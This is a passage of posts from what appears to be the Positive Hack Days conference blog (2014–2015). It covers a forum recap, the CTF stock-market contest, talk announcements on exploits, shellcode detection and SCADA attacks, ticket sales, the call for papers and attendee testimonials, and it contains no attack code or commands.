court as well) and said, that the security of citizens, data privacy in particular, was the task #1 for the government; therefore, the federal law on data processing center (DPC) transfer to the Russian territory won't be postponed. "The international business totally agrees with that," he said. Vadim's colleague Ilya Kostunov had recently revealed that Google Analytics was installed in all the Russian governmental bodies. Thus, he made an inquiry to the Prosecutor General's Office and Ministry of Economic Development. Ilya mentioned that Russia had had an opportunity to launch its own payment system with chip cards back in 2000.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6O6veZwosbc/VWgWwG34AjI/AAAAAAAAE7k/Ocu-xBTJQRg/s1600/new28-053.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="http://3.bp.blogspot.com/-6O6veZwosbc/VWgWwG34AjI/AAAAAAAAE7k/Ocu-xBTJQRg/s640/new28-053.jpg" width="640" /></a></div><br /> When securing data in large companies with extensive infrastructures, they say, "A chain is only as strong as its weakest link". Natalya Kukanova from Yandex mentioned in her report — Pig in a Poke: M&A Security Issues — that Yandex deducts the cost of vulnerability elimination from the profit when acquiring third-party projects.<br /><br />Not only can a large business have growth problems. There are several events traditionally held at PHDays on supporting and promoting IS ideas and solutions. Almaz Capital, a venture capital fund that was represented by managing partner Alexander Galitsky and general partner Geoffrey Baehr, organized an open contest among startups in IS. Moreover, Geoffrey Baehr told about 18 IS startups fighting for 1.5 million rubles and gave some advice to the founders of the new companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-kzTmqUkwMFc/VWgWhYGgmVI/AAAAAAAAE7c/WLPQOoQR5XU/s1600/new28-054%2B%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://4.bp.blogspot.com/-kzTmqUkwMFc/VWgWhYGgmVI/AAAAAAAAE7c/WLPQOoQR5XU/s640/new28-054%2B%25281%2529.jpg" width="640" /></a></div><br /><div style="text-align: center;"><i>Photo @<a href="https://twitter.com/AlmazCapital" target="_blank">AlmazCapital</a></i></div><br />The PHDays V organizers held a round-table discussion on making an international community of "white hats". Among the participants were the organizers of the top hacker conferences — CanSecWest (Canada), Vangelis and Power of Community (Korea), H2HC (Brazil), CodeBlue (Japan), Chaos Communication Congress (Germany), ZeroNights and PHDays (Russia).<br /><br />The first day ended with reading the best short stories out of 200 works sent for the Hacked Future contest. Bruce Sterling, the father of cyberpunk fiction, had made the decision on the final standings, and then the MDS team read out the stories about cybernetic Trojans, devourers and head controllers to the forum participants.<br /><br />The winners of the Hacked Future contest:<br /><ul style="text-align: left;"><li>I place — Pavel Gubarev ("Uncle Zhenya")</li><li>II place — Alexander Matukhin ("Prestige")</li><li>III place — Dmitry Bogutsky ("Casting Dice")</li><li>IV place was shared between Mikhail Savelichev ("Sixty Deaths of Axis Maria"), Nikolay Murzin and Timur Denisov under the pseudonym "Rumit Kin" ("The Numb Man"), and Juliana Lebedinskaya ("Shadow and Eliza").</li></ul></div>Unknownnoreply@blogger.com283tag:blogger.com,1999:blog-5176771794789502609.post-87691819386004899512015-05-25T17:08:00.001+03:002015-05-25T17:08:49.816+03:00Making Money on Cyberwar<div dir="ltr" style="text-align: left;" trbidi="on">It is well known that insider info about ups and downs of large corporations, if gained in time and played right, can earn you millions on the stock market. It’s hackers’ prerogative to get hold of such data or to influence a company’s activity by cracking critical business systems. So why not make some dough on your skill at Positive Hack Days V?<br /><br />This year PHDays participants will be able to become part of our virtual country — the United States of Soviet Unions (USSU) — and trade stocks on the PHDays Stock Market. All forum attendees will be able to buy and sell “company” stocks (firsthand or using a broker) and gain advantage from insider info on the stock market.<br /><a name='more'></a><br />The hacker contest participants will be able to effect share prices by hacking railway companies, power plants, news agency sites, and other resources. In addition, successful hacking attacks may give you some useful information.<br /><br />You may spend virtual money to treat yourself to a drink in our bar or to buy souvenirs with the forum’s logo. For additional info, feel free to address our specialists that will be located next to the bar counter in the WTC Congress Hall.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-s-ZUh4rFOJc/VWMsvkIOcAI/AAAAAAAAE6c/rt1dVzAPlz4/s1600/tshirt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-s-ZUh4rFOJc/VWMsvkIOcAI/AAAAAAAAE6c/rt1dVzAPlz4/s320/tshirt.png" width="274" /></a></div><b><span style="font-size: large;">PHDays СTF</span></b><br /><br />PHDays CTF annual international competitions in information security have gained recognition due to their carefully crafted plotline and realism. This time the CTF will differ from anything you’ve seen before. The defining feature of the new event is the PHDays Stock Market. Technically, it’s a customary task-based CTF with a fair amount of innovations and assumptions.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-P5o7o3mneRA/VWMs1mM_1RI/AAAAAAAAE6k/ZjlzvfUyYDM/s1600/ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-P5o7o3mneRA/VWMs1mM_1RI/AAAAAAAAE6k/ZjlzvfUyYDM/s640/ctf.png" width="640" /></a></div><br />According to the 2015 scenario, each team will play the part of a hacker gang operating in the USSU, which has its power industry, transportation and banking systems, telecoms, and media; and at the heart of economic and political life of the country is a stock market.<br /><br />In order to win, teams will have to accomplish various tasks distributed by the underground labor market DarkNet, e.g. to intercept GSM traffic between an ATM and the processor (the Leave ATM Alone contest), collide trains (Choo Choo Pwn), and uncover a CEO of a large corporation (Competitive Intelligence).<br /><br />Corporate hacks will allow you to make money by trading stocks on the PHDays Stock Market: attacks affect share prices, and obtained insider info will help you to speculate wisely.<br /><br />You may compromise company resources via Internet (Competitive Intelligence and WAF Bypass) or locally, while on stage (Leave ATM Alone, Hacknet, and other contests).<br /><br />Just like in real life, CTF participants may decide not to share their exploits and use their knowledge to get dirty rich on the stock market or to sell it on the BlackMarket hacker forum. In addition, you may get reward for any advisory that you submit to the USSU CERT.<br /><br />For closed orders and advisories sent to the CERT, teams will receive money in virtual currency — publes. The team that receives the most amount of publes wins.<br /><br />This year any forum participant may join the fun. If you have a ticket to PHDays and want to create a team, you may register at any moment up until the first day of the forum — May 26, 9:00 a.m. Moscow time. All you need is to assemble a team of three PHDays participants or more and send your info to phd [at] ptsecurity.com.<br /><br /><a href="http://www.phdays.com/program/ctf/">www.phdays.com/program/ctf/</a><br /><br /></div>Unknownnoreply@blogger.com1115tag:blogger.com,1999:blog-5176771794789502609.post-55831007888437355722015-04-29T13:29:00.000+03:002015-04-29T13:29:04.768+03:00PHDays V: How to Create Your Own Shodan, Find ROP Shellcodes, and Automate Reverse Engineering<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pr4ffsMvZ_g/VUCqTQmcMqI/AAAAAAAAExE/9M-HMyV-EL4/s1600/131e814ca6446df0c7dc5a14bf5ba037.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pr4ffsMvZ_g/VUCqTQmcMqI/AAAAAAAAExE/9M-HMyV-EL4/s1600/131e814ca6446df0c7dc5a14bf5ba037.jpg" height="426" width="640" /></a></div><br />The fifth Positive Hack Days international forum on practical security will take place in Moscow World Trade Center on May 26-27. With the second wave of Call for Papers finished, we present a new portion of reports.<br /><a name='more'></a><br /><b><span style="font-size: large;">Automation: Reverser’s Helper</span></b><br /><br />Reverse engineering often implies thorough analysis of an application system code, and the star tool here is a disassembler. Researchers encounter various difficulties — from deciding on an order of function processing and differences in system versions to inability to fully debug and emulate the code in built-in systems.<br /><br />In his report Anton Dorfman, who presented a <a href="http://www.slideshare.net/phdays/anton-dorfman" target="_blank">workshop on mastering shellcode</a> at PHDays III, will share his experience in creating a reverse engineering plugin based on IDAPython, which is capable of conducting primary automated code analysis and transferring results from a currently researched system to its other versions.<br /><br /><b><span style="font-size: large;">How to Create Your Own Shodan</span></b><br /><br />The acclaimed international security specialist Igor Agievich will cover the topic of creating a search system identical to “<a href="http://www.sdcitybeat.com/sandiego/article-11458-the-worlds-most-dangerous-search-engine.html" target="_blank">the world’s most dangerous search engine</a>” — Shodan.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-whIB3woGUKw/VUCqr0LMCxI/AAAAAAAAExM/BKt2dNEdPFE/s1600/nout.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-whIB3woGUKw/VUCqr0LMCxI/AAAAAAAAExM/BKt2dNEdPFE/s1600/nout.jpg" height="360" width="640" /></a></div><br />The speaker will compare the developed system to its counterparts and give examples of curious devices detected by the new search engine.<br /><br /><b><span style="font-size: large;">Catching ROP Shellcodes in Network Traffic</span></b><br /><br />Remote vulnerability exploitation is one of the most powerful tools attackers have in their arsenal — this is how worms are spread and sensitive information is leaked. In order to bypass security, attackers developed a shellcode-constructing technique using return-oriented programming. The new type of shellcode was called ROP shellcode.<br /><br />The former participant of the CTF team Bushwhackers Svetlana Gayvoronskaya will present a utility that conducts static and dynamic network traffic analysis for ROP shellcodes. Last year Svetlana together with Ivan Petrov presented a report on <a href="http://2014.phdays.com/program/tech/37682/" target="_blank">shellcode hunt for ARM</a>.<br /><br /><b><span style="font-size: large;">One Month Left Until PHDays</span></b><br /><br />The fifth Positive Hack Days forum on practical information security is coming up. The arrangements for PHDays V are in full swing. The organizers are putting together the competitive program and presentation schedule. You may find the previous announcements on our website (<a href="http://www.phdays.com/press/news/40211/" target="_blank">1st</a> and <a href="http://www.phdays.com/press/news/40200/" target="_blank">2d</a>).<br /><br />In the near future, we will publish on the site the full list of speakers including abstracts. Follow <a href="http://www.phdays.com/press/news/" target="_blank">our newsfeed</a> and you will not miss all the juicy stuff.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-10gov4Q-nw8/VUCrndyGj3I/AAAAAAAAExc/VXZB1fJ3Ba8/s1600/183eced2478fb930fc9c6fce73113499.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-10gov4Q-nw8/VUCrndyGj3I/AAAAAAAAExc/VXZB1fJ3Ba8/s1600/183eced2478fb930fc9c6fce73113499.jpg" height="426" width="640" /></a></div><br />Even now you may vote for the most interesting presentations — click on “Want to visit” near the report of your choice on the <a href="http://www.phdays.com/program/" target="_blank">forum program page</a>. The voting will help us to make the correct arrangements for meeting rooms based on their sitting capacity.<br /><br />You still have the opportunity to <a href="http://www.phdays.com/how_to_join/" target="_blank">join PHDays V</a> but do not linger — only few tickets are left.<br /><br />See you in May!</div>Unknownnoreply@blogger.com221tag:blogger.com,1999:blog-5176771794789502609.post-58433172338872425002015-02-25T10:47:00.001+03:002015-02-25T10:47:46.466+03:00What's New in the PHDays Program: supercomputer protection, iOS security, exploit selling<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-VFKyMFZGrR4/VO19nNhuqGI/AAAAAAAAEs8/Wh_EbCh0YKk/s1600/DSC_0927.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-VFKyMFZGrR4/VO19nNhuqGI/AAAAAAAAEs8/Wh_EbCh0YKk/s1600/DSC_0927.jpg" height="424" width="640" /></a></div><br />The first stage of Call for Papers has finished recently and we'd like to announce another batch of reports that will be presented on May 26 and 27 at PHDays V (you can find the <a href="http://blog.phdays.com/2015/02/phdays-v-encryption-standards-m-in.html" target="_blank">first announcement</a> on our blog). Speakers will discuss how to improve iOS application security and what hackers find attractive about supercomputers. They will also address the relationship between sellers and buyers of zero-day vulnerability exploits.<br /><a name='more'></a><br /><b><span style="font-size: large;">Debugging automation</span></b><br /><br />Alexander Tarasenko's report is devoted to debugging automation using WinDbg. Attendees will gain skills in writing scripts using the built-in WinDbg's engine, and also in Python and Pykd extension. The report will be interesting for code researchers and developers of software that requires uncommon debugging tools.<br /><br /><b><span style="font-size: large;">iOS security</span></b><br /><br />Prateek Gianchandani, a member of OWASP and an information security engineer at Emirates, will lead a hands-on lab on developing exploits for iOS applications. During the demonstration, the speaker will use his own application with typical vulnerabilities. Participants will learn how to improve iOS applications' security level at the stage of development. Upon the introductory part, participants will try to test iOS applications by themselves.<br /><br /><b><span style="font-size: large;">On guard of supercomputers</span></b><br /><br />Felix Wilhelm and Florian Grunow from ERNW, a German infosec company, will tell about the IBM General Parallel File System, abouts its architecture and vulnerabilities. The system is used in certain known supercomputers (such as IBM Watson), which makes it a prime target for attackers aiming at both data stored in the file system and the system's powerful resources. The speakers will demonstrate the exploitation of two security bugs in IBM GPFS.<br /><br /><b><span style="font-size: large;">Exploit selling</span></b><br /><br />Alfonso De Gregorio, the founder of BeeWise and chief consultant at secYOUre, will speak about the relationship between sellers and buyers of zero-day vulnerability exploits, about morals in the exploit market.<br /><br /><b><span style="font-size: large;">Hash hacking at fifth gear</span></b><br /><br />Alexey Cherepanov took part in the development of John the Ripper and maintains its GUI interface. He will tell us how to speed-up hash hacking by using code generation methods.<br /><br /><b><span style="font-size: large;">Fast and useful</span></b><br /><br />In addition to standard reports the PHDays V program includes an extensive FastTrack that involves informative and dynamic short speeches.<br /><br />Sergey Kharkov, a specialist at National Research Nuclear University MEPhI, will tell attendees how to tap a GSM-based phone by attacking a GSM network and replacing the base station.<br /><br />Moreover, Sylvain Pelissier, a cryptologist and a security engineer at Kudelski Security, will show how sometimes file encryption tools allow cracking user passwords.<br /><br />During Denis Gorchakov's presentation, the audience will learn how to prevent payment fraud. He will speak about a hardware and software system for virus analysis, detection of botnet control centers and data collectors.<br /><br />The second stage of <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> started on February 16. It will last till March 31, so you still have a chance to become a speaker at PHDays this year.<br /><br />We also invite you to participate in CFP launched by our partner, the <a href="http://conference.hitb.org/hitbsecconf2015ams/" target="_blank">HITB</a> conference.<br /><br />We look forward to seeing you at Positive Hack Days V!</div>Unknownnoreply@blogger.com234tag:blogger.com,1999:blog-5176771794789502609.post-53784246794556162772015-02-24T09:44:00.000+03:002015-02-24T09:44:49.591+03:00PHDays V: Encryption Standards, M&A in Yandex and Chemical Attacks<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ml3Vqe1W3fc/VOirwSnljmI/AAAAAAAAEro/7olTgFxwFX8/s1600/10098d24b90f899fcdff7c8d5eee594f.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ml3Vqe1W3fc/VOirwSnljmI/AAAAAAAAEro/7olTgFxwFX8/s1600/10098d24b90f899fcdff7c8d5eee594f.png" height="426" width="640" /></a></div><br />Early December was marked with Call for Papers opened for everyone willing to speak at Positive Hack Days V. Later we announced the first speakers introducing John Matherly, the creator of Shodan, John Bambenek, a cyber detective, and Chris Hadnagy, a professional social engineer.<br /><br />The first CFP stage was over at the end of January. Today we present a new portion of reports included in the technical, practical and business program of upcoming <a href="http://www.phdays.com/" target="_blank">PHDays</a>. The forum guests will learn how to fortify a corporate IT system digitally, how to bypass Moscow Metro Wi-Fi authorization, and how attackers exploit vulnerabilities in physical processes.<br /><a name='more'></a><br /><b><span style="font-size: large;">Yandex: Security for Mergers and Acquisitions</span></b><br /><br />When a company buys another company, nobody ever thinks of a security audit. If, by any chance, it comes to the limelight, the current regulatory requirements alone are analyzed.<br /><br />Yandex is actively purchasing technological projects all over the world now and then detonating the media scene with news about another grand merger. An information security analyst of the search giant, Natalya Kukanova, will throw light on how and why they included the security audit into the merging processes (M&A). The audience will learn what to check in case of M&A deals, how to organize audit, and how to interpret its results. All bullet points will be exemplified by real Yandex' deals.<br /><br /><b><span style="font-size: large;">Encryption Standards of the Future</span></b><br /><br />Markku-Juhani Saarinen will detail into the NIST-sponsored CAESAR project, which is an international crypto competition aimed at the creation of a new AE security standard instead of AES-GCM (this algorithm was certified by the USA and NATO to handle secret information, but was detected to contain various security problems).<br /><br />The speaker will acquaint his audience with CAESAR cyphers and consider weak and strong points of the current encryption standards and algorithms in Russia (e.g. the GOST R 34.10-2001 signature algorithm).<br /><br />Markku-Juhani Saarinen has been studying information security and cryptography and developing cryptographic software for more than 15 years already.<br /><br /><b><span style="font-size: large;">Around OSX Sandbox</span></b><br /><br />Alexander Stavonin will analyze how OSX (a sandbox designed with TrustedBSD) security tools work and how widely they are used by third-party applications. He will demonstrate potential problems and exploitation of TrustedBSD by cybercriminals — all exemplified by the source code.<br /><br /><b><span style="font-size: large;">How to Build a Digital Fortress</span></b><br /><br />An information security and forensics expert from Bulgaria, Alexander Sverdlov, will take his floor at PHDays for the third time (his workshops on cyber forensics attracted a full house in <a href="http://2013.phdays.com/program/reports/#4" target="_blank">2013</a> and <a href="http://2014.phdays.com/program/hands-on-labs/36812/" target="_blank">2014</a>) and will teach how to build an impregnable digital fortress. The audience will study how to enhance router protection installing alternative operating systems (Qubes OS, BSD Router project, SRG/STIG), to stop exploits, and to analyze application security.<br /><br /><b><span style="font-size: large;">If Hackers Were Chemists</span></b><br /><br />Researchers and cybercriminals repeatedly demonstrate ways to hack SCADA systems that control <a href="http://blog.ptsecurity.com/2014/07/what-is-so-dangerous-in-smart-grids.html" target="_blank">electricity</a>, transport and <a href="http://blog.phdays.com/2014/06/smart-city-hacked-at-phdays-iv.html" target="_blank">critical infrastructure elements</a> such as chemical plants. However, dealing with such facilities, information security specialists often ignore the role of physical processes.<br /><br />Such processes (e.g. a chemical reaction) can keep on running despite the actions of cybercriminals with full control over an infrastructure or management system. Yet if malicious users learn to exploit physical conditions, they will be able to affect reaction and process flows. The consequences are threatening: it's not that hard to imagine an explosion on a chemical plant provoked by a temperature monitoring sensor driven mad by a hacker in a cistern with a hazardous substance.<br /><br />Maryna Krotofil, a Doctoral Candidate at Hamburg University of Technology, will put the audience in touch with the main stages of attacks aimed at destroying a specific physical process.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-k6DN78-ptm0/VOitb6SaOQI/AAAAAAAAEr0/Oy39N7tsJKg/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-k6DN78-ptm0/VOitb6SaOQI/AAAAAAAAEr0/Oy39N7tsJKg/s1600/logo.png" height="130" width="640" /></a></div><br />The second wave of <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> is coming soon. Don't waste your chance to speak for 3,000 participants of Positive Hack Days! The exact dates will be announced in the nearest future. Keep track of the news.<br /><br />To familiarize yourself with issues touched upon at PHDays, follow our post on the l<a href="http://www.phdays.com/press/news/38072/" target="_blank">ast year's best reports</a>.</div>Unknownnoreply@blogger.com162tag:blogger.com,1999:blog-5176771794789502609.post-57259547842926476932014-12-23T16:33:00.002+03:002014-12-23T16:33:51.486+03:00Tickets For PHDays V Now Available<div dir="ltr" style="text-align: left;" trbidi="on">Ticket sales for the forum on practical information security Positive Hack Days V will start on Wednesday, December 23.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Errp-n8Z_6s/VJlusEykt1I/AAAAAAAAEhU/UaeQCKEk24c/s1600/new23-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Errp-n8Z_6s/VJlusEykt1I/AAAAAAAAEhU/UaeQCKEk24c/s1600/new23-12.png" height="434" width="640" /></a></div><br />A two-day ticket bought until January 12 will cost 7,337 rubles. You can register and buy a ticket on the "<a href="http://www.phdays.com/how_to_join/" target="_blank">Join the forum</a>"' page.<br /><a name='more'></a><br />The Early Birds discount will be available from January 12 till February 27, 2015: a ticket will cost 9,600 rubles per two days and 7,337 rubles per day.<br /><br />From March 2, the prices will change to: 14,400 per two days and 9,600 per day.<br /><br /><b><span style="font-size: large;">Other ways to join PHDays V</span></b><br /><br />There are <a href="http://www.phdays.com/how_to_join/" target="_blank">several ways</a> to to take part in the forum. First of all, you can get involved as a speaker. The first stage of accepting submissions of interesting reports on information security will last till January 30.<br /><br />You can apply for participation through the <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">forum's site</a>. The list of best reports read during the last year's event is available <a href="http://blog.phdays.com/2014/06/best-reports-at-phdays-iv-surveillance.html" target="_blank">here</a>.<br /><br />Moreover, anyone is able to win an invitation during various competitions (check our <a href="http://www.phdays.com/press/news/" target="_blank">news</a> on the official website) or to hold his or her own forum as part of PHDays Everywhere. To learn more about events organized through this program in previous years, please visit the <a href="http://www.phdays.com/press/news/8141/" target="_blank">forum's site</a>.<br /><br />We look forward to seeing you at Positive Hack Days V!</div>Unknownnoreply@blogger.com135tag:blogger.com,1999:blog-5176771794789502609.post-61499936565467443772014-12-03T15:00:00.000+03:002014-12-03T21:25:41.917+03:00How to Speak at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on">Positive Hack Days V, the international forum on practical information security, opens <a href="http://www.phdays.com/program/call_for_papers/" target="_blank">Call for Papers</a> on December 1. If you want to share your research results or have something to tell the community about, you are welcome to join PHDays speakers on May 26 and 27, 2015.<br /><br />The forum has provided the stage for such speakers as Bruce Schneier (the legendary cryptography expert), Travis Goodspeed, Karsten Nohl, Marc "van Hauser" Heuse, Ruslan Gattarov, Datuk Mohd Noor Amin (IMPACT, UN).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cYc50kaVV6I/VH9VkdeFIyI/AAAAAAAAEfA/4WmD_VvRR5g/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA%2B%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0%2B2014-12-03%2B%D0%B2%2B21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-cYc50kaVV6I/VH9VkdeFIyI/AAAAAAAAEfA/4WmD_VvRR5g/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA%2B%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0%2B2014-12-03%2B%D0%B2%2B21.png" height="522" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div>Chief executives, CIO and CISO of the world's largest companies, information security experts, elite hackers, representatives of Skolkovo Foundation and governmental institutes are regular PHDays participants.<br /><a name='more'></a><br />The first stage is until January 30, 2015. Don't waste your time — the number of final talks is limited.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-YK4ukadg7nY/VH7ssDfGn9I/AAAAAAAAEec/JLIvhwnQbPs/s1600/6b6e86e8d39cb391d1ac2d4736190ec6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-YK4ukadg7nY/VH7ssDfGn9I/AAAAAAAAEec/JLIvhwnQbPs/s1600/6b6e86e8d39cb391d1ac2d4736190ec6.jpg" height="426" width="640" /></a></div><br />More than 2,500 experts from 18 countries visited PHDays IV in spring 2014. More than 3,000 participants are expected in 2015. You'd better learn the <a href="http://www.phdays.com/press/news/38660/" target="_blank">researches</a> presented last year.<br /><br />Your honors and certificates aren't of much importance. What we value is a new approach to threatening information security issues. The <a href="http://www.phdays.com/program/review-board/" target="_blank">review board</a> accepts applications from both recognized information security experts and novice researchers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aSgbHt-kYn0/VH7s4prgfuI/AAAAAAAAEek/1KRShpGb-vg/s1600/3b6cd2e484c0bc8e0e1b1e5d533905a5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-aSgbHt-kYn0/VH7s4prgfuI/AAAAAAAAEek/1KRShpGb-vg/s1600/3b6cd2e484c0bc8e0e1b1e5d533905a5.jpg" height="424" width="640" /></a></div><br />Find any details about the format, participation rules, and CFP instructions on the PHDays website: <a href="http://www.phdays.com/program/call_for_papers/">http://www.phdays.com/program/call_for_papers/</a><br /><br />See you at PHDays V! <br /><div><br /></div></div>Unknownnoreply@blogger.com207tag:blogger.com,1999:blog-5176771794789502609.post-15996080280762443412014-11-26T15:56:00.000+03:002014-11-26T17:00:01.072+03:00Positive Hack Days V: entering a singularity<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_c1RDi696Ko/VHXLsMyu5QI/AAAAAAAAEbg/nV1n61ZL1X0/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_c1RDi696Ko/VHXLsMyu5QI/AAAAAAAAEbg/nV1n61ZL1X0/s1600/1.png" height="427" width="640" /></a></div><br />The fifth Positive Hack Days international forum on practical information security will take place in World Trade Center Moscow on May 26 and 27, 2015. The conference organized by Positive Technologies will bring together leading experts on cyber defense and the elite of the hacker world, representatives of state institutions and executives of large businesses, young scientists and journalists.<br /><a name='more'></a><br />More than 2,500 experts from 18 countries visited PHDays IV in 2014. The formula of PHDays remains the same: a passion for discovery, no dull advertising, unique equipment, large space for experiments, professional discussion kept right to the point, informal communication between hackers and information security experts as well as contests based on the real-life experience.<br /><br />As in years before, the fifth PHDays conference will bring its surprises inspired by the general theme of this year's forum.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lbioyqNJxWQ/VHXMMC566ZI/AAAAAAAAEbw/-fNJCAyE5CM/s1600/cf6ecc56ffe431b430c560ba78387fe4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lbioyqNJxWQ/VHXMMC566ZI/AAAAAAAAEbw/-fNJCAyE5CM/s1600/cf6ecc56ffe431b430c560ba78387fe4.jpg" height="426" width="640" /></a></div><br /><b><span style="font-size: large;">The singularity is out there</span></b><br />Many present-day visionary thinkers and futurists believe that human civilization is now at the point of global changes. Worldwide network has accelerated the exchange of information; the pace of scientific and technological progress can be compared with a taking off rocket. Neural networks and quantum computers, the Internet of Things and artificial intelligence, nanotechnology and bioengineering... What if all these things start working for the welfare of mankind? Perhaps it will be the most wonderful time in the history of humanity...<br /><br />And vice versa, it may be the most dangerous epoch for society when a wave of chaos comes down on digital space and distorts the unprepared canvas of reality. In this New World, every word you said and every action you took will be stored, indexed and used against you. The boundaries of this world will be transparent for some people but turn into the walls of a prison for others.<br /><br />Well, now we are close enough to the bifurcation point and even an insignificant influence on the complex system can cause the avalanche-like restructuring. Which scenario will we face? Is it going to be a high-tech barbarism from William Gibson's Bridge trilogy and the land of of Pelevin's "zukerbrins" or the new "Noon: 22nd Century" when human civilization raises the up to the next level, overcoming the diseases and exploring other planets?<br /><br />Every night when we go to sleep we have a chance to wake up in another universe. At any time, the expanding to infinity universe may turn back and then rush to the start point. Or maybe finish point.<br /><br />Back to singularity. Will We Make the Right Choice?<br /><br /><b><span style="font-size: large;">The fifth spring will be hot</span></b><br />During the four years apart from wins in in ratings and various awards the forum earned a lot of good words from professionals from the information security community.<br /><br /><i>Expert opinion:</i><br /><br /><b>Bruce Schneier,</b> a cryptography expert, Chief Security Technology Officer at British Telecom:<br /><blockquote class="tr_bq">We have been organizing security conferences for more than ten years. The major part of them are boring corporate events. However, this conference is something completely different. It not only inspires, it is very practical and quite counter-cultural.</blockquote><b>Marc "van Hauser" Heuse: </b><br /><blockquote class="tr_bq">I had high expectations when I came to Moscow. I thought of Russian lead hackers like having long beards, dressed fully in black, with their small laptops. Actually, it was more friendly and more open-minded. People were wearing everything from black clothes to business suits, there were a lot of students... It was a nice mix actually.</blockquote><b>Nick Galbreath: </b><br /><blockquote class="tr_bq">Defcon seems to have a competitor. And that is good.</blockquote><b>Sergey Khodakov, </b>Head of Information Security Sector at Skolkovo:<br /><blockquote class="tr_bq">PHDays gives talented teams momentum for development and for finding their way in entrepreneurship, in the white hat community. </blockquote><b>William Hagestad,</b> a military expert in cyber-intelligence:<br /><blockquote class="tr_bq">PHDays is a unique event, where we can see how information security is created and find out who is who in this field. The forum is notable due to realistic contests, such as CTF, Critical Infrastructure Attack and the contest where participants are dealing with a smart home's obstacles.</blockquote><b>geohot:</b><br /><blockquote class="tr_bq">It was fantastic and very intensive. </blockquote><b>Marc Furrer, </b>President of ComCom:<br /><blockquote class="tr_bq">It was a very good experience. PHDays is tremendously creative. Fantastic atmosphere.</blockquote><b>Yury Grin,</b> Deputy Director of ITU Telecommunication Development Bureau:<br /><blockquote class="tr_bq">PHDays-like events demonstrate how many sides information security has and what difficulties specialists from different fields of practice meet in the course of information infrastructure protection.</blockquote>Arrangements for PHDays V are in full swing. Positive Technologies' experts are busy at night preparing technical drawings, performing analysis behind closed doors, searching and buying rare equipment. For now, you can check out video <a href="http://youtu.be/FOJYF61uN8c" target="_blank">compilations</a> of previous events and <a href="http://www.phdays.com/press/news/38660/" target="_blank">reports</a> of the fourth forum, and prepare your own research because our Call for Papers will be open soon. Everyone has a chance!<br /><br /><iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/FOJYF61uN8c" width="480"></iframe> <br /><b>See you at Positive Hack Days V!</b><br /><div><br /></div></div>Unknownnoreply@blogger.com122tag:blogger.com,1999:blog-5176771794789502609.post-54475310193943722752014-07-16T11:21:00.000+04:002014-07-16T11:21:44.765+04:00Review of Competitive Intelligence Tasks<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div>Today we'd like to speak about certain practical aspects of confidential data gathering in terms of tasks of the online contest Competitive Intelligence, which was held during May 15, 16 and 17.<br /><br /><a name='more'></a><br /><div 